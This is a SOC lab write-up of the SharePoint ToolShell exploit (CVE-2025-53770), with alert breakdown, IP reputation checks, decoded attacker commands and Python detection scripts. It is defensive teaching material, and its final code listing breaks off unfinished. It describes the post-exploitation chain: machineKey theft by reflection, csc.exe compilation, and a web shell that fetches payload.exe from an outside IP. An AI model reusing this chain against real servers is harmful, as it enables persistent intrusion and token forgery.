
CVE-2025-53770 PoC — Microsoft SharePoint Server Remote Code Execution Vulnerability

**Associated Vulnerability**

**Title:** Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)

**Description:** Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.

**Readme**
# 🧠 LetsDefend SharePoint Zero-Day Analysis (ToolShell - SOC342-CVE-2025-53770)

## 📘 Introduction
I investigated a SharePoint zero-day called **ToolShell (CVE-2025-53770)** in the **LetsDefend** cyber lab.  
The exercise mimicked a **real-world zero-day RCE attack**: a malicious POST request bypassed authentication, ran Base64-encoded PowerShell to read the ASP.NET *machineKey* values (`ValidationKey`/`DecryptionKey`) through `MachineKeySection`, compiled `payload.exe` on the host with `csc.exe`, and dropped a web shell (`spinstall0.aspx`) into the SharePoint LAYOUTS folder.  
This README documents the **attack process, forensic steps, containment actions**, and **lessons learned**.

---

## ⚙️ Lab Overview
| Field | Details |
|-------|----------|
| **Platform** | LetsDefend Cyber Range |
| **Target** | SharePoint Server (`SharePoint01`) |
| **CVE** | CVE-2025-53770 |
| **Objective** | Analyze RCE, practice detection & containment |
| **Tools Used** | Windows PowerShell, VirusTotal, AbuseIPDB, Talos Intelligence, LetsDefend Log Management, LetsDefend Endpoint Security, Base64 Decoder, LetsDefend Threat Intel |

---

## 🚨 The Alert
A **critical alert** flagged a suspicious POST to `ToolPane.aspx` on SharePoint with a large payload and a spoofed *Referer* header.  
This matches **CVE-2025-53770**, a zero-day that allows **unauthenticated RCE** via crafted POST requests to that endpoint.

![Nat_Created](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20133717.jpg)
![Nat_Created](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Alert.jpg)

 
## 🚨 Alert Breakdown — SOC342: CVE-2025-53770 SharePoint ToolShell Auth Bypass & RCE

---

### 🔴 **Critical**
**What it is:** The severity level assigned to this alert — highest and most urgent.  
**Why it matters:** Indicates this event could lead to **full system compromise (RCE)**. Treat as **top-priority**: isolate and investigate immediately.

---

### 🕒 **Jul 22, 2025 — 01:07 PM**
**What it is:** The timestamp when the alert was triggered.  
**Why it matters:** Use it to **locate logs**, correlate related events, and **build a timeline** (search a window of a few minutes to a few hours around it). Check which clock each source uses: IIS W3C logs are written in UTC by default, while the alert console and Windows event logs may show local time.

---

### ⭐ **SOC342 — CVE-2025-53770 SharePoint ToolShell Auth Bypass and RCE (Rule)**
**What it is:** The **detection rule or signature** that fired, describing the matched condition (ToolShell exploit attempt).  
**Why it matters:** Identifies **what attack pattern** was detected — useful for hunting similar cases (e.g., unauthenticated POSTs to admin pages or potential webshell uploads).

---

### 🧩 **320 (EventID)**
**What it is:** Numeric identifier for this specific alert instance or rule (vendor-defined).  
**Why it matters:** Helps with **tracking**, filtering, and referencing this alert in tickets or reports.

---

### 🌐 **Web Attack (Category)**
**What it is:** High-level classification — this alert targets **web infrastructure**.  
**Why it matters:** Routes incident to the **web/SharePoint/infra** team and applies **web-specific playbooks**.

---

### 👤 **Level: Security Analyst**
**What it is:** Analyst role or escalation level expected to handle the alert.  
**Why it matters:** Indicates this is **not a Tier-1** alert — requires a **Security Analyst** (experienced responder) for immediate action.

---

### 🖥️ **Hostname: SharePoint01**
**What it is:** Name of the affected host (target or origin of the activity).  
**Why it matters:** This is the **primary containment target** — isolate, collect evidence, and monitor this system first.

---

### 🌍 **Source IP Address: 107.191.58.76**
**What it is:** The IP that sent the suspicious request (attacker infrastructure, a proxy/VPN exit, or a compromised host).  
**Why it matters:** **Block** it at the firewall/WAF, **search** for other hits from it, and check ownership/geo info. Note: a completed HTTP POST cannot have a spoofed source address, so the IP is real, but it is often rented cloud capacity or a botnet node rather than the attacker's own system; treat it as an indicator, not an attribution.

---

### 🧭 **Destination IP Address: 172.16.20.17**
**What it is:** The internal target IP (SharePoint01).  
**Why it matters:** Confirms which internal system was targeted — map it to hostname and **review internal access paths/firewall rules**.

---

### 📬 **HTTP Request Method: POST**
**What it is:** The HTTP verb used — client sent data to the server.  
**Why it matters:** **POSTs to admin endpoints** are suspicious when unauthenticated or large — they can carry **exploit payloads or webshells**.

---

### 📎 **Requested URL:**  
`/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx`  
**What it is:** The exact targeted web path and parameters.  
**Why it matters:** This is a **SharePoint admin/layout endpoint** — commonly abused by attackers for **auth bypass or code uploads**. Hunt for other requests to the same path.

---

### 🧠 **User-Agent:**  
`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0`  
**What it is:** The browser string reported by the client.  
**Why it matters:** Often **spoofed** by attackers to look legitimate — can help **filter logs**, but **don’t rely on it for attribution**.

---

### 🔗 **Referer:**  
`/_layouts/SignOut.aspx`  
**What it is:** HTTP header claiming the request came from SharePoint’s sign‑out page.  
**Why it matters:** No legitimate navigation posts from the sign‑out page to `ToolPane.aspx`; in ToolShell this exact `Referer` value is what the exploit sets to get the request past SharePoint's authentication check, so it is an exploit artifact, not background noise. Compare against legitimate navigation flows and hunt for any other request carrying it.

---

### 📦 **Content-Length:** `7699`
**What it is:** Size of the HTTP request body (in bytes).  
**Why it matters:** A **large POST body** to an admin endpoint suggests a **serialized exploit object or file upload**. Look for other POSTs of similar size to the same URL.

---

### ⚠️ **Alert Trigger Reason**
**Text:** Suspicious unauthenticated POST request targeting `ToolPane.aspx` with large payload size and spoofed referer — indicative of **CVE-2025-53770** exploitation.  
**What it is:** Rule explanation summarizing the matched behavior.  
**Why it matters:** Describes **exactly why** the alert fired — verify whether the request was unauthenticated, what payload was sent, and if it matches known exploit patterns.

---

### 🚧 **Device Action: Allowed**
**What it is:** Indicates the **protecting device’s response** (e.g., WAF/firewall).  
**Why it matters:** Since it was **allowed**, the **attack reached the host** — treat as potential compromise.  
**Immediate actions:**  
- **Block source IP** (`107.191.58.76`)  
- Enable blocking rules  
- Investigate destination host (`SharePoint01`)  
- **Tune WAF/firewall** to block future requests with similar patterns.

---

**🔎 Summary:**  
This alert reflects an unauthenticated exploit attempt against **ToolPane.aspx** (SharePoint RCE, CVE-2025-53770). The POST request carried a large payload and a spoofed `Referer`, consistent with **ToolShell zero-day exploitation behavior**. Because the device allowed the request, assume **possible compromise** until proven otherwise. 🟥 **Severity:** Critical

---

## Quick checks (1–3 minutes)

1. **Search IIS/WAF logs for POSTs to ToolPane.aspx** (around `2025-07-22 13:07`; IIS W3C logs are in UTC by default, so widen the window if the alert time is local):  
   `Get-ChildItem "C:\inetpub\logs\LogFiles" -Recurse -Filter *.log | Select-String -Pattern "POST /_layouts/15/ToolPane.aspx" | Out-File .\IIS_ToolPane_hits.txt`

2. **Pull the full POST body** from WAF/proxy or packet capture and save it to the forensic share (IIS logs do not record request bodies).

3. **Look for new/modified ASPX in the SharePoint hive** (web shells), covering both the `15` and `16` hives:  
   `Get-ChildItem "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions" -Recurse -Filter *.aspx | Where-Object LastWriteTime -gt (Get-Date).AddDays(-7) | Sort-Object LastWriteTime -Descending | Select-Object FullName, LastWriteTime`

4. **Block attacker & isolate host**: block `107.191.58.76` at perimeter/WAF and move `SharePoint01` to quarantine (or restrict egress).

> **Do not delete** suspected files — make forensic copies first.
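To make the log hunt in steps 1–3 concrete, here is an added example (not part of the LetsDefend lab or the original write-up) that parses IIS W3C log lines and flags the ToolShell pattern from the alert: an unauthenticated POST to `ToolPane.aspx` with `DisplayMode=Edit` and a `Referer` of `/_layouts/SignOut.aspx`, plus any request to a `spinstall*.aspx` path. The log lines are constructed for the example and mirror the alert fields on this page; the `CORP\jdoe` user, the `10.10.5.23` client and the `sharepoint01` hostname are assumptions.

```python
"""Flag ToolShell (CVE-2025-53770) patterns in IIS W3C extended log lines.

Added example for this write-up; not code from the LetsDefend lab.
SAMPLE_LOG is CONSTRUCTED: it mirrors the alert fields on this page
(ToolPane.aspx POST, SignOut.aspx Referer, spinstall0.aspx) and adds two
benign authenticated requests so the rules have something to ignore.
IIS writes W3C timestamps in UTC by default; the alert console showed 13:07 local.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-22 13:05:40 172.16.20.17 GET /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\jdoe 10.10.5.23 Mozilla/5.0+(Windows+NT+10.0) https://sharepoint01/sites/hr/default.aspx 200
2025-07-22 13:07:02 172.16.20.17 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 107.191.58.76 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 /_layouts/SignOut.aspx 200
2025-07-22 13:07:14 172.16.20.17 GET /_layouts/15/spinstall0.aspx - 443 - 107.191.58.76 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 200
2025-07-22 13:08:00 172.16.20.17 POST /sites/hr/_vti_bin/client.svc/ProcessQuery - 443 CORP\jdoe 10.10.5.23 Mozilla/5.0+(Windows+NT+10.0) https://sharepoint01/sites/hr/ 200
"""

# SharePoint hive number varies (15 or 16), so match any digits.
TOOLPANE = re.compile(r"/_layouts/\d+/toolpane\.aspx$", re.I)
WEBSHELL = re.compile(r"/_layouts/\d+/spinstall\d*\.aspx$", re.I)


@dataclass
class Hit:
    when_utc: str
    client_ip: str
    uri: str
    reasons: list[str] = field(default_factory=list)


def parse_w3c(text: str) -> list[dict[str, str]]:
    """Map each data line to the column names declared by the #Fields directive.

    W3C fields are space-separated; IIS encodes spaces inside a value as '+',
    so a plain split is safe. Lines whose field count does not match are
    skipped rather than risk mis-mapping columns.
    """
    fields: list[str] = []
    rows: list[dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            parts = line.split(" ")
            if fields and len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows


def classify(row: dict[str, str]) -> list[str]:
    """Return the ToolShell indicators present in one request, empty if none."""
    reasons: list[str] = []
    method = row.get("cs-method", "").upper()
    stem = row.get("cs-uri-stem", "")
    query = row.get("cs-uri-query", "").lower()
    referer = row.get("cs(Referer)", "").lower()
    unauthenticated = row.get("cs-username", "-") == "-"

    if TOOLPANE.search(stem):
        if method == "POST" and "displaymode=edit" in query:
            reasons.append("POST to ToolPane.aspx with DisplayMode=Edit")
        if referer.endswith("/_layouts/signout.aspx"):
            reasons.append("Referer spoofed as /_layouts/SignOut.aspx")
        if method == "POST" and unauthenticated:
            reasons.append("unauthenticated POST to an edit endpoint")
    if WEBSHELL.search(stem):
        reasons.append("request to spinstall*.aspx web-shell path")
    return reasons


def triage(text: str) -> list[Hit]:
    hits: list[Hit] = []
    for row in parse_w3c(text):
        reasons = classify(row)
        if reasons:
            hits.append(Hit(f"{row['date']} {row['time']}Z", row["c-ip"], row["cs-uri-stem"], reasons))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f"{hit.when_utc} {hit.client_ip} {hit.uri}")
        for reason in hit.reasons:
            print(f"    - {reason}")
```

The authenticated `GET` to `ToolPane.aspx` is deliberately not flagged: editing web parts is normal admin activity, and it is the combination of POST, missing user and the SignOut referer that makes the exploit request stand out. Point `triage()` at a real `u_ex*.log` file and add the `15` hive path if the farm still runs it.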


## 🧩 What is SharePoint?
**Microsoft SharePoint** is a collaboration and document management platform.  
It provides secure file storage, version control, and intranet portals, integrated with **Active Directory, Teams, Outlook, and Power BI.**

### 🔐 Security Considerations
- Uses AD/SSO for authentication  
- Data encryption at rest & in transit  
- Web parts and layouts can be abused if misconfigured  
- Requires regular patching to defend against zero-days  

---

## 🧨 CVE-2025-53770 (ToolShell)
A **critical unauthenticated RCE** vulnerability in on-premises **Microsoft SharePoint Server** caused by deserialization of untrusted data; the exploit chain pairs an authentication bypass on `ToolPane.aspx` (abusing the `Referer` header) with the deserialization bug.  
Attackers use it to:
- Execute code remotely as the SharePoint application pool identity
- Exfiltrate ASP.NET `machineKey` material (`ValidationKey`/`DecryptionKey`)
- Deploy web shells for persistence, and reuse stolen keys to forge signed `__VIEWSTATE` so access survives patching unless the keys are rotated  

🧮 **CVSS Score:** 9.8 (Critical)  
📡 **Exploitation:** Active in the wild (Microsoft shipped out-of-band fixes in July 2025)  

---

## 🧠 Attack Analysis with VirusTotal

**Source IP:** `107.191.58.76`  
🧩 **Result:** 15/95 security vendors flagged it as malicious.

![Nat_Created](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20135646.jpg)

### 🌍 IP Location & Reputation
Checked via **AbuseIPDB** — IP linked to:
- Hacking and brute-force attempts  
- Web app attacks  
- Port scanning  
- DNS poisoning  

![AbuseIPDB Result](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20140231.jpg)

### 🌐 Talos IP Reputation
Checked via **Talos Intelligence** — IP/subnet characteristics:
- Hosted by **Vultr (cloud provider)**
- Hostnames in the range: `*.vultrusercontent.com`
- Forward/reverse DNS mostly **not matched**
- Email reputation: Mostly **Neutral**, some **Poor**
- Minimal email volume (0–0.6 per day/month)
- Indicates occasional misuse, supporting **malicious activity context**
  
![Talos Result](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20140024.jpg)

---

## 🖥️ Endpoint Analysis
Located host **SharePoint01** in Endpoint Security.  
Examined **Terminal History** for suspicious commands.

![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20141653.jpg)

The log shows that at 13:07:11 a PowerShell process ran under the SharePoint application pool identity and executed a Base64-encoded command; the recorded parent process was services.exe, and the command targeted SharePoint directories. PowerShell running as the web application's identity with an encoded command is a clear indicator of ToolShell exploitation and remote code execution on the SharePoint server.

---

## 🧾 PowerShell Findings

### What the PowerShell command options mean

- `-nop` = `-NoProfile`: start PowerShell **without loading the user profile** (avoids profile-based logging/hooks, starts faster).  
- `-w hidden` = `-WindowStyle Hidden`: run **without showing a window** (stealth).  
- `-e` = `-EncodedCommand`: the following argument is the script **Base64-encoded from UTF-16LE** (PowerShell only decodes `-e` payloads as UTF-16LE; a UTF-8 blob is what you see instead in `[Convert]::FromBase64String(...)` loaders). It hides the code from casual inspection and from simple keyword matching on the command line.  
- `<BASE64>`: the long Base64 payload; decoded, it contains an **ASPX server script** (a web shell) that reads the `machineKey` values.
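The decoding step described above, as an added example that is not the lab's decoder or the attacker's code: it pulls the Base64 argument out of a PowerShell command line (either `-e`/`-EncodedCommand` or an inline `FromBase64String(...)`), decodes it as UTF-16LE with a UTF-8 fallback, and lists the ToolShell indicators it finds. Both command lines are constructed for the example; the embedded scripts only reference the type and method names discussed on this page and do not read or send any key.

```python
"""Decode PowerShell -EncodedCommand / FromBase64String payloads and scan them for
ToolShell post-exploitation indicators.

Added example for this write-up; not the lab's decoder or the attacker's code.
The two command lines below are CONSTRUCTED: the embedded scripts only reference
the type and method names discussed on this page and do not read or send keys.
"""
from __future__ import annotations

import base64
import re

# -EncodedCommand accepts any unambiguous prefix; these are the forms seen in the wild.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Droppers that avoid -e often decode inline instead; that blob is UTF-8, not UTF-16LE.
FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

INDICATORS = {
    "MachineKeySection": "touches the ASP.NET machineKey configuration section",
    "GetApplicationConfig": "non-public accessor used to read machineKey via reflection",
    "ValidationKey": "ViewState MAC key",
    "DecryptionKey": "ViewState / forms-auth encryption key",
    "spinstall0.aspx": "ToolShell web-shell file name",
    "TEMPLATE\\LAYOUTS": "SharePoint web-accessible layouts folder",
    "csc.exe": "on-host compilation",
    'runat="server"': "server-side ASPX code",
}


def extract_encoded_payload(cmdline: str) -> str | None:
    """Pull the Base64 argument out of a PowerShell command line, if any."""
    m = ENC_FLAG.search(cmdline) or FROM_B64.search(cmdline)
    return m.group(1) if m else None


def _mostly_ascii(text: str) -> bool:
    # A UTF-8 blob mis-decoded as UTF-16LE turns into CJK-range code points,
    # so the share of ASCII characters is the cleanest tell.
    return bool(text) and sum(ord(ch) < 128 for ch in text) / len(text) > 0.9


def decode_encoded_command(b64: str) -> tuple[str, str]:
    """Return (script, encoding). -e is always UTF-16LE; fall back to UTF-8 for inline blobs."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    if len(raw) % 2 == 0:
        text = raw.decode("utf-16-le", errors="replace")
        if _mostly_ascii(text):
            return text, "utf-16-le"
    return raw.decode("utf-8", errors="replace"), "utf-8"


def scan_indicators(script: str) -> list[str]:
    low = script.lower()
    return [name for name in INDICATORS if name.lower() in low]


def analyze(cmdline: str) -> dict:
    b64 = extract_encoded_payload(cmdline)
    if b64 is None:
        return {"payload": None, "encoding": None, "indicators": []}
    script, enc = decode_encoded_command(b64)
    return {"payload": script, "encoding": enc, "indicators": scan_indicators(script)}


def _b64(text: str, encoding: str) -> str:
    """Build the constructed samples the same way PowerShell expects them."""
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed sample 1: a -e payload shaped like the decoded command on this page
# (type lookup by reflection); the key read and response write are left as a comment.
SAMPLE_KEYDUMP_SCRIPT = (
    "$t=[System.Web.Configuration.MachineKeySection]\n"
    "$m=$t.GetMethod('GetApplicationConfig',[Reflection.BindingFlags]'Static,NonPublic')\n"
    "# ...ValidationKey / DecryptionKey written into the HTTP response...\n"
)
SAMPLE_ENCODED_CMDLINE = "powershell.exe -nop -w hidden -e " + _b64(SAMPLE_KEYDUMP_SCRIPT, "utf-16-le")

# Constructed sample 2: an inline UTF-8 blob that would drop an ASPX file into LAYOUTS.
SAMPLE_DROPPER_SCRIPT = (
    '$p="$env:CommonProgramFiles\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx"\n'
    "# Set-Content $p '<script runat=\"server\">...</script>'\n"
)
SAMPLE_UTF8_CMDLINE = (
    "powershell.exe -nop -c \"iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + _b64(SAMPLE_DROPPER_SCRIPT, "utf-8") + "')))\""
)

if __name__ == "__main__":
    for cmd in (SAMPLE_ENCODED_CMDLINE, SAMPLE_UTF8_CMDLINE):
        result = analyze(cmd)
        print(result["encoding"], result["indicators"])
```

Feed `analyze()` the `CommandLine` field of Sysmon Event ID 1 or Security 4688 records from the web servers; anything that decodes and hits `MachineKeySection` or `GetApplicationConfig` goes straight to the top of the queue.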


![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20155002.jpg)

## Command Line Findings with Base64 Decoder:

![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20152735.jpg)

### ⚙️ Behavior Summary
- Uses reflection to load the `System.Web` assembly
- Accesses the non-public `MachineKeySection.GetApplicationConfig()` method
- Reads `ValidationKey` & `DecryptionKey`
- Writes the results into the HTTP response → exfiltration over the same web channel the exploit used

This indicates machineKey theft for forging signed `__VIEWSTATE` and auth tokens: classic ToolShell post-exploitation.

### Command 1 — C# Compilation:

![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20155029.jpg)

🧩 Finding: Attacker compiled payload.cs into payload.exe using built-in .NET compiler → likely malware.

**What this literally does (step‑by‑step):**
- Runs the program `csc.exe` → the **C# compiler** that ships with the .NET Framework.  
- `/out:C:\Windows\Temp\payload.exe` → tells the compiler **where to save the compiled program** and what to name it (`payload.exe`).  
- `C:\Windows\Temp\payload.cs` → the **C# source file** (human‑readable code) that the compiler turns into a runnable program.

**Why this is dangerous (novice explanation):**
- The attacker converted text code (`.cs`) into an executable (`.exe`) on the victim machine.  
- The binary (`payload.exe`) can perform any actions the attacker programmed: open network connections, spawn shells, install persistence, or steal data.  
- Using the built‑in compiler helps attackers avoid dropping obvious malicious binaries and can bypass script‑only monitoring.

**How the attacker likely used it in the attack chain:**
- After achieving code execution via the web exploit, the attacker created or uploaded `payload.cs`.  
- They compiled it into `payload.exe` so it could run as a native program on the server.  
- The compiled payload was then used to carry out follow‑on actions (beaconing, backdoors, lateral movement).

**Evidence to look for (what to search in logs / files):**
- Process creation events for `csc.exe` with arguments pointing to `payload.cs` or `/out:C:\Windows\Temp\payload.exe`. Note that ASP.NET itself legitimately spawns `csc.exe` from `w3wp.exe` for dynamic page compilation, but those builds write under `Temporary ASP.NET Files`, not `C:\Windows\Temp`; the output path is the discriminator.  
- The compiler normally lives under `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\`; a `csc.exe` running from any other location is itself suspicious.  
- Existence of `C:\Windows\Temp\payload.cs` and `C:\Windows\Temp\payload.exe` (collect forensic copies and compute hashes).  
- Parent/child process relationships showing `w3wp.exe` / `powershell.exe` / `cmd.exe` spawning `csc.exe`.  
- Network activity or process activity originating from `payload.exe` if it executed.

**One-line summary (for README / ticket):**  
`Attacker used the .NET C# compiler (csc.exe) to compile payload.cs into payload.exe on the host — creating a native executable for follow‑on malicious activity.`

---

### Command 2 — Web Shell Deployment:

![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/463f1f4d4a504fedb4b0dc9ee6504e26ba12cfc5/Lets%20defend/Screenshot%202025-09-29%20155055.jpg)

🧩 Finding: Created `spinstall0.aspx` inside SharePoint’s LAYOUTS directory → web-accessible backdoor.

**What this literally does (step‑by‑step, plain English):**
- Runs `cmd.exe /c` → starts the Windows command shell to run a single command and then exit.  
- `echo <...> > "...\spinstall0.aspx"` → prints the provided HTML/ASPX text and **writes it into the file** `spinstall0.aspx` (the `>` operator creates or overwrites the file).  
- The written content includes `runat="server"` → makes the file **server‑side ASPX**, so IIS/SharePoint executes it inside the web application process rather than serving it as static text.  
- The `<object>` element contains `Url="http://107.191.58.76/payload.exe"` → instructs the page (or server when executed) to fetch the attacker’s `payload.exe` from the remote host.

**Why this is dangerous (novice explanation):**
- The attacker created a **server‑side page** in a web‑accessible SharePoint folder; because it runs on the server, it can perform actions with the web app’s privileges.  
- The page can instruct the server to **download and run** the attacker’s payload, enabling remote code execution and persistence.  
- A file in the webroot is easy to trigger via HTTP requests, allowing remote re‑use without additional uploads.

**How the attacker likely used it in the attack chain:**
- After initial code execution via the ToolPane.aspx exploit, the attacker wrote `spinstall0.aspx` into the SharePoint `LAYOUTS` folder.  
- The web shell is triggered by visiting the page or invoked by application code, causing the server to fetch `payload.exe` from the attacker host.  
- The fetched payload is then executed or staged, providing a persistent backdoor for the attacker.

**Evidence to look for (what to search in logs / files):**
- File present at:  
  `C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx` — collect a forensic copy and compute SHA256.  
- File creation/write events (Sysmon EventID 11 or Windows Audit 4663) showing `cmd.exe` writing to that path.  
- IIS logs showing requests to `spinstall0.aspx` or outgoing requests to `http://107.191.58.76/payload.exe`.  
- Process creation or network activity immediately after accesses to `spinstall0.aspx` (indicating payload download/execution).  
- Other suspicious ASPX files in SharePoint LAYOUTS with similar content or names.

**One-line summary (for README / ticket):**  
`Attacker created a server‑side ASPX web shell (spinstall0.aspx) in SharePoint’s LAYOUTS folder that instructs the server to fetch/run payload.exe from attacker infrastructure — persistent remote backdoor.`

### Command 3 — MachineKey Exfiltration:

![Terminal History](https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320/blob/1bf59d201a78b36a1057955e1cc1ae613b700d5e/Lets%20defend/Screenshot%202025-09-29%20155122.jpg)

🧩 Finding: Executed PowerShell to read and exfiltrate the MachineKey configuration. This is post-exploitation, not a precondition for the RCE: with the keys, the attacker can forge signed `__VIEWSTATE` and keep executing code even after the server is patched, until the keys are rotated.

**What this literally does (step‑by‑step):**
- Runs `powershell.exe` → the Windows scripting shell.  
- `-Command` tells PowerShell to execute the following expression.  
- `[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()` calls into .NET to retrieve the ASP.NET **machineKey** configuration object (`ValidationKey`, `DecryptionKey`, and related settings). `GetApplicationConfig` is a non-public static method, so working tooling reaches it through reflection (`GetMethod(...)` with `NonPublic`, then `Invoke`); those names appearing together in a command line or an ASPX file are a useful hunt pattern.  
- In short: the attacker asked .NET (via PowerShell) to return the web app’s secret machineKey values.

**Why this is dangerous (novice explanation):**
- The `machineKey` holds secrets that ASP.NET uses to:
  - Sign and validate `ViewState` and forms‑auth cookies.  
  - Encrypt/decrypt sensitive web tokens.  
- If an attacker obtains `ValidationKey`/`DecryptionKey`, they can:
  - Forge signed `ViewState` or auth cookies, or decrypt tokens.  
  - Make the server accept forged requests → **bypass authentication** and trigger deserialization of attacker-controlled `__VIEWSTATE` for code execution. Because the keys are independent of the patched bug, this access survives patching until the keys are rotated.

**How the attacker likely used it in the attack chain:**
- Exploit `ToolPane.aspx` to run code inside the SharePoint app process.  
- Execute this PowerShell command (or an ASPX that does the same) to read the machineKey.  
- Capture `ValidationKey` / `DecryptionKey`.  
- Use keys to craft signed payloads (e.g., malicious `ViewState`) or valid auth cookies to escalate access.

**Evidence to look for (what to search in logs / files):**
- Process creation events showing `powershell.exe` with `GetApplicationConfig` or `MachineKeySection` in the command line.  
- Web responses, logs, or saved files containing long hex strings (likely `ValidationKey` / `DecryptionKey`).  
- ASPX pages or webshells that call `MachineKeySection` / `GetApplicationConfig`.  
- Unusual activity by the web app pool user (e.g., `IIS APPPOOL\SharePoint`) at same timestamps.

**One-line summary (for README / ticket):**  
`Attacker executed PowerShell to call System.Web.Configuration.MachineKeySection::GetApplicationConfig() — attempting to exfiltrate ASP.NET machineKey (ValidationKey/DecryptionKey), enabling token forgery and authentication bypass.`
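Commands 1–3 above are usually spotted together, so here is an added example (not the lab's detection logic or LetsDefend's rule set) that runs a small rule set over Sysmon-shaped process-creation (ID 1) and file-creation (ID 11) events and reports which rules each record trips: `w3wp.exe` spawning a shell, encoded PowerShell, `MachineKeySection`/`GetApplicationConfig` in a command line, `csc.exe` compiling into `C:\Windows\Temp`, and an `.aspx` written into `TEMPLATE\LAYOUTS` by a shell. The events are constructed to mirror the three commands on this page, with two benign look-alikes (ASP.NET's own `csc.exe` run and a patch writing a layouts page) that a naive rule would also flag; the `IIS APPPOOL\SharePoint` identity, the `Framework64` compiler path and the event times are assumptions.

```python
"""Correlate process-creation and file-creation events for the ToolShell
post-exploitation chain described in Commands 1-3.

Added example for this write-up; not the lab's detection logic. EVENTS is a
CONSTRUCTED, Sysmon-shaped list (id 1 = process create, id 11 = file create):
the first four records mirror the commands on this page, the last two are
benign look-alikes that a naive rule would also flag. The IIS APPPOOL\SharePoint
identity and the Framework64 csc.exe path are assumptions.
"""
from __future__ import annotations

import re

SHELLS = {"powershell.exe", "cmd.exe"}
SHELL_OR_WORKER = SHELLS | {"w3wp.exe"}

# Any hive number; any .aspx directly under TEMPLATE\LAYOUTS.
LAYOUTS_ASPX = re.compile(r"\\web server extensions\\\d+\\template\\layouts\\[^\\]+\.aspx$", re.I)
# csc.exe writing its output under C:\Windows\Temp. ASP.NET's own dynamic
# compilation writes under "Temporary ASP.NET Files", so it does not match.
CSC_TEMP_OUT = re.compile(r"/out:\s*\"?[a-z]:\\windows\\temp\\", re.I)
ENCODED_FLAG = re.compile(r"(?i)\s-e(?:c|n|nc|ncoded|ncodedcommand)?\s")
MACHINEKEY = re.compile(r"MachineKeySection|GetApplicationConfig", re.I)

EVENTS = [
    # 1. Encoded PowerShell launched by the SharePoint worker process
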